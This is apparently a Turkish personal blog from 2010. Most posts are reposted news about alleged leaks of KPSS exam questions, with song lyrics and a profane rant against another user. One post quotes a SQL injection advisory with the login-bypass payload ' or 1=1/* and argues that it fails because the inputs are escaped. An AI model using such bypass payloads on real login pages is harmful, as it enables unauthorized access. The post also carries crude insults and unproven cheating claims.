Koncuk, sözlerinin ardından KPSS eğitim bilimleri sorularını içeren “PDF” formatında bir dosyayı gazetecilere gösterdi.

Dosyanın 5 Temmuz 2010'da saat 14.22'de oluşturulduğunu anlatan Koncuk, dosya tarihinin değiştirilmediğini, orijinal dosya üzerinde değişiklik yapılmadığını da tespit ettiklerini söyledi.

Konucuk, sınavın 10 Temmuzda, eğitim bilimleri testinin de aynı gün öğleden sonra yapıldığını anımsatarak, şu iddialarda bulundu:

“Bu dosya 5 Temmuzda oluşturuldu. Bu dosyada ne var? Dosya, sınavdan beş gün önce oluşturulmuş. Bu dosya bizim tespit ettiğimiz bir e-mail adresine gönderiliyor. O e-mail adresini hukuken suç olduğu için söylemeyeceğim. Ama bu bilgiyi ve o e-mail adresinin sahibini biz tespit ettik. Bu sorular o e-mail adresine gönderilmiş. Bu yüzde yüz. Uludağ Üniversitesi Eğitim Fakültesi'nden 2007'de sınıf öğretmenliği bölümünden mezun olmuş bir KPSS adayına ait hotmail uzantılı bir e-mail bu. Bu kişi erkek ve doğum yeri İç Akdeniz'e doğru bir ilimizin ilçesi. Ayrıca sınavda tam puan da alamamış. Bu sorular, muhtemelen her il merkezindeki onlarca kişiye gönderildi ve onların e-mail adresinin üzerinden başkaları bu soruları aldı.

Yani bir e-mail adresine sorular geliyor. Ben arıyorum birilerini ve 'benim e-mail adresime gir şifresi de şu. Bu şifreden soruları al' diyorum. Şöyle de olabilir. Bunların eğitim bilimleri sınavına ait olduğu da söylenmemiş olabilir. 'Al bundan faydalan' da denilmiş olabilir. Yani kopya olduğu anlaşılmasın diye. Bu da mümkündür.”

Bu olayı tesadüfen yakaladıklarını dile getiren Koncuk, “İlleri aşmışız ilçelere kadar bu sorular servis edilmiş” dedi. Koncuk, bu bilgileri istendiği takdirde, savcılığa, YÖK Denetleme Kurulu'na ve Devlet Denetleme Kurulu'na vereceklerini söyledi.

“IP ADRESLERİNDEN TESPİT EDİLSİN”

Kimlerin söz konusu e-mail adresine girdiğinin IP adreslerinden tespit edilebileceğini belirten Koncuk, “eğitim.son” adıyla oluşturulmuş bu dosyanın başka hangi e-mail adreslerine gittiğinin de hotmail sağlayıcıları tarafından belirlenebileceğini söyledi.

İsmail Koncuk, bu kişinin bulunduğu ilçenin kopya işlerinin merkezi olduğunu düşünmediğini de dile getirerek, “O, e-mail adresine başka e-mail adreslerinden soruların gelmesi kuvvetle muhtemel. Yani yetkililer çok net olarak bu e-mailin nereden gönderildiğini ortaya çıkarabilir” dedi.

“SORULAR HAM HALİYLE SERVİS EDİLMİŞ İDDİASI”

Tespit ettikleri dosyada yer alan soruların “ham” olduğunu, asıl sınavdakilerden ufak tefek farklılıklar gösterdiğini ve dosyada sınavdaki 4 sorunun bulunmadığını dile getiren Koncuk, “Bu durum, soruların daha baskıya girmeden, birilerinin eline geçtiğini, e-mail adreslerine servis edildiğini gösteriyor. Telefon trafiğiyle de belli gruplara servis edilmiş” dedi.

Bu grupların savcı tarafından belirlenmesi gerektiğini ifade eden Koncuk, “Bu, kesinlikle kendi mensuplarına, menfaat temin etmek isteyen, öncelik kazandırmak isteyen bir grubun işi. Bunu ortaya çıkarmak benim işim değil. Araştırmalarda bunların hangi gruplara ait olduğu da ortaya çıkacaktır” diye konuştu.

“Servis edilen sorularda, asıl sınavdaki sorularda bulunmayan bazı yazım ve ifade bozukluklarının bulunduğunu” iddia eden Koncuk, “Bu ham metin olduğu için birileri alelacele bu soruları bir yere göndermiş. Ama ÖSYM, bunları baskıdan önce düzeltmiş” dedi.

“DOST VE AKRABALARINA DA VERMİŞLERDİR”

Soruları ele geçirenlerin dost ve akrabalarına da bu soruları vermesinin mümkün olduğunu vurgulayan Koncuk, “Şunu çok net söyleyebiliriz. Bu sorular, yüzlerce değil, binlerce insana gönderilmiştir. Hatta sorular öylesine ortada gezmiş ki ayağa düşmüş” diye konuştu.

Bu tespitlerinin ardından savcılık, Devlet Denetleme Kurulu, YÖK Denetleme Kurulu'nun gerekeni yapması gerektiğini belirten Koncuk, “Bu işin üzerine gidilirse bu işe karışmış olan hemen herkes çorap söküğü gibi ortaya çıkacaktır. Bilgisayar aleminde yazdığınız her kelime attığınız her adım kayıt altına alınır” diye konuştu.

Koncuk, bunların ortaya çıkarılmaması halinde olayların arkasında başka konuların bulunduğunu düşüneceklerini söyledi.

“SINAV SİSTEMİ MERCEK ALTINA ALINMALI”

ÖSYM Başkanı Ünal Yarımağan'ın “düzgün bir adam” olduğuna inandığını dile getiren Koncuk, “Ama Yarımağan'ın altında yüzlerce insan var. Onun için ÖSYM sınav sisteminin de bir mercek altına alınması, sorgulanması gerektiğini olaylar gösteriyor” dedi.

Koncuk, soruları hakkıyla yapanları korumak istediklerini dile getirerek sözlerini şöyle tamamladı:

“Elimizde yarım bardak su var. İçerisine yüzde 10 kadar lağım suyu karışmış. (Şu tarafı temiz kalmış şu tarafını içeyim) deme hakkını kendimizde bulabilir miyiz? Bu kadar olaydan sonra (ben hakkımla yaptım) diyen insanlara güven kalır mı? Tüm derdimiz haksızlığa uğrayanlara hakkını teslim etmeye çalışmak. Ama artık bu kadar geniş boyut kazanmış olaylar yaşandıktan sonra (ben hakkımla almıştım, benim durumum ne olacak?) sorusu bayat kalıyor.”

kaynak: http://www.memurlar.net/haber/175477/

27 Ağustos 2010 Cuma

pythonZ dangalağına

pythonZ (o mal kendini iyi biliyor) acıyorum sana her(nesi)kimsen. la dangalak sen (nesi)kimsin ki ben yada life hakkında yorum yapasın. malmısın yokmusun olum siyego :S gitsen kumda oyna kaleler yap al bir ikide örnek sana


24 Ağustos 2010 Salı

velet - askın inadına

ne dediğini zaman zaman anlamayabilirsiniz ama sözler harbi süper ;)

eller gülümün elini ellemiş
şimdi allahın beni durdursun

velet - askın inadına [ by ogusan sungur ] | izlesene.com



bazen şarkılarla anlatırsın duygunu
bazense siirlerle
bezen sevdiğin uzaklarda olur
o nedenle ver sihiri gönder güvercinle
ben bi kuşum ve yanına geliyorum
kanımda bi not seni seviyorum
her gece camında gülümü bekliyorum
melek gibi yatışını izliyorum
yetmiyor bize ne bana nede sana
yanına gelsem ama bana gelecek bela
güneş doğuyor gülüm uyanacaksın
hadi ay parçam ,,,sana elveda!
kalbim alev alsın seviyorum
buralar sana uzak bunu biliyorum
ben güneşin amma sönüyorum
çağırsınlar gülümü duyamıyorum
biliyorum sana gelmek zor gibi
beni gören olsa derdi yok bunun evi
sensizlik ilk aşkın misali
bendeyse eski kötü mazi
yarim beni sevsin benide duysun
elimi beline koyup öyle uyusun
el bebek gül bebek gülümün dikeni
gönül yaramıda dikecektir elbet
yarim bana gelsin elimi tutsun
kanadımın hasreti acımı unutsun
eller gülümün elini ellemiş
şimdi allahın beni durdursun
gülüm sana bakmaya kıyamıyorum
sen benim namusum dokunamıyorum
sıcak tenin tenime değdimi alev alip
mum gibi karşında eriyorum
kalbinin zindanına beni bağla
ol bi dalga , fırtınayada kapılma
gel vur yanaş benim limanıma
alt üst et gemide ben ve koca tayfa
yazdım kazıdım adını bi ağaca
yaprak dökümü aşkım bahara
kar düşerse gülüm kapının önüne
girsin bir tohum gözünün içine
bak gözüm dinle bu şarkı SANA
besteler yazdım ben senin adına
aşklar dikendir basalım inadına
gülüm yanlızım yetiş imdadıma
yarim beni sevsin benide duysun
elimi beline koyup öyle uyusun
el bebek gül bebek gülümün dikeni
gönül yaramıda dikecektir elbet
yarim bana gelsin elimi tutsun
kanadımın hasreti acımı unutsun
eller gülümün elini ellemiş şimdi
allahın beni durdursun
sen bir kurşun kalbime sıktın
sensiz yaşamaktan gülüm bıktım
günlerim sayılı sana kavuşacam
kanadı kırık güvercinle barışacam
aylar bana yıllar gibi geldi
gülümün gülüşü gözümün önündeydi
acılar verdim nedeni neydi
onca acıya rağmen beni sevdi
gülüm biliyon mu bu şarkı sana
kuş ol bir öpücük kondur şurama burama
bu gecede sensiz yastıksa koynumda
taşıyom gülüm adını boynumda
bu şarkıyı özel birine yazdım
ve birkez daha adını andım
aşkın inadına sevecem seni
aşkın inadına sevecem seni
yarim beni sevsin benide duysun
elimi beline koyup öyle uyusun
el bebek gül bebek gülümün dikeni
gönül yaramıda dikecektir elbet
yarim bana gelsin elimi tutsun
kanadımın hasreti acımı unutsun
eller gülümün elini ellemiş şimdi
allahın beni durdursun

23 Ağustos 2010 Pazartesi

LifeSteaLeR dan bomba bi script geliyor gibi

dün demodan bi görüntü gönderdi gayet basarılı bi calısma olmus yani tema özellikle benim çok hoşuma gitti yakışır life kardesime hazırlasın valla bende kullanıcam tabi müsade ederse :P yav bıktım bu amk blogspottan :S şöyle kımıl kımıl bir domain (nasıl oluyorsa artık) fena olmaz sanırım :D

poffsss

içimden geldi valla ;) sıkıldım yav :S

20 Ağustos 2010 Cuma

Kpss 2010 Soruları Birilerine Verildi

neler neler olmusta haberimiz yok 2009 da eğitim sorusunu yanlış dahi olsa cevaplayamayan hatta sınava girmeye dahi gerek duymayan kişiler 2010 da eğitim fullemiş :S haberi olduğu gibi veriyorum buyrun sizde gözlerinizle sonucları görün (TC numaraları haric)

800 bin adayın katıldığı KPSSnin sonuçlarına göre 500’ün üzerinde katılımcının eğitim bilimleri sınavında 120de 120 net çıkarması da tartışma konusu oldu.

Bazı adaylar, 2009da yapılan KPSS’deki sınav birincisinin bile tüm soruları doğru yanıtlayamadığını anımsatarak, ‘Acaba polislik sınavında olduğu gibi sorular bazı kesimlerce ele mi geçirildi?’ kuşkusunu taşıdıklarını dile getirdi.

Netlerinin yanlış hesaplandığını ve puanlarının beklediklerinden daha düşük geldiğini öne süren adaylar, ÖSYMye dilekçeyle göndermeye başladı. ÖSYM Başkanı Prof. Dr. Ünal Yarımağan, KPSSye ilişkin yapacağım bir açıklama yok, bu yüzden bu konuda görüş belirtmek istemiyorum” diyerek soruları yanıtsız bıraktı.

Yetkililer, eğitim bilimleri sınavında çok sayıda adayın tüm soruları doğru yanıtlamasını da yine soruların kolay olmasına bağlayarak, “Sonucuyla ilgili kuşkuları olanlar bize başvurabilirler” mesajı verdiler.

Eğitim-Sen Genel Başkanı Zübeyde Kılıç da KPSS’ye yönelik güvensizliği artıracak bir dizi sorun yaşandığını vurgulayarak, şöyle konuştu;

Bu sorunlardan dolayı bazı kesimler, sonuçlara kuşkuyla yaklaşıyor. ÖSYMye ve yaptığı sınavlara ilişkin her sonuç açıklanması sırasında, ‘Acaba şimdi ne sorun çıkacak? sorusu akıllara geliyor. Çok sayıda aday bize de gelip kuşkularını dile getirdi. Ancak biz soruların çalındığına ilişkin net bir veriye sahip değiliz.

Bu bir olasılık dahilinde, polis koleji sınavında da bir şaibe olmuştu, sonra sınav iptal edilmişti. Şimdi de bazı şaibeler ortaya atılıyor ama elimizde bunu kanıtlayan herhangi bir şey yok. Elimizde kanıt olmadığı için bir şey söyleyemiyoruz.



Soy isimlerinde de benzerlik olan bazı kişilerin sonuçlarını gözledik. Bir Kaç Tc kimlik numarasından baktığımız sonuçlar şöyle:



http://sesiniduyur.org/kpss/vedat2009.htm

http://sesiniduyur.org/kpss/vedat2010.htm





http://sesiniduyur.org/kpss/filiz2009.htm

http://sesiniduyur.org/kpss/filiz2010.htm



http://sesiniduyur.org/kpss/levent2009.htm

http://sesiniduyur.org/kpss/levent2010.htm



http://sesiniduyur.org/kpss/seher2009.htm

http://sesiniduyur.org/kpss/seher2010.htm

kaynak:

http://sesiniduyur.org/detay-44-kpss_2010_sorulari_birilerine_verildi.html

19 Ağustos 2010 Perşembe

koyma açık, açık olmaz ;)

şimdi birazcık inj3ct0r.com da geziniyim dedim oda nesi biri acık yayınlamıs acığın sonuna da bypassı eklemiş ;) author vermiyorum darılmaca olmasın diye ;)



Vulnerable File in admin/giris.php
###################################################
################### Error Line'z ####################
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
###################################################

Inject to giris.php
Exploitiez

id : ' or 1=1/*
pw : ' or 1=1/*



oldumu babacan demedin mi biri indirir scripti :S a.q adam engellemiş scripte bypassı boş bug göndermeyin inceleyin iyice :S sadece sorguya bakarak acık mevcut diyemezsin ki :S bak bakalım line 61 den aşağısına


//line 61
$isim=$_POST['isim'];
$sifre=$_POST['sifre'];
$isim=htmlspecialchars(mysql_real_escape_string($isim));
$sifre=htmlspecialchars(mysql_real_escape_string($sifre));



adam paşalar gibi önlemini almıs :S

sırf asağıda ki sorgudan yola cıkamazsın


//line 73
$sorgu=mysql_query("select * from yonetim where isim='$isim' and sifre='$sifre'");
$sayi=mysql_num_rows($sorgu);



ne biliyim a.q nerdesin str0ke :S

hobaaa eğitim full


işte gelde sorular çalındı amuğa koyum deme. benim girmediğim deneme kalmadı fullenecek sınavı da biliyoruz zor sınavıda bu seneki eğitime basit diyen adamın amına koyarım la hiç mi basit sınav görmedik sabahki basitti itiraz eden? efenim ? ses yok. ama eğitim zordu sabahkini fulleyemeyen adam eğitimi hiç fulleyemez rahat 10 tane kaynaklarda dahi olmayan bilgileri bilmeyi gerektiren soru vardı hem nerde görülmüş 300 üstü kişinin şimdiye kadar eğitim fullediği :S tabi bu ne kadar doğru bilemiyorum işte yazıya denk geldiğim site işte resim ;) benim devletimize ve hükümetimize güvenim sonsuz eminim ki gereken yapılacaktır sadece su fulleyenler ve fulle yakın yapanlar devre dısı bırakılsa dahi yeter sınavın iptaline gerek bile kalmaz

kaynak:

http://www.sesiniduyur.org/detay-41-_kpss_2010__da_kopya_olayi:_iste_kanit.html

kaynak 2:

http://www.memurlar.net/haber/174657/
 
Dizi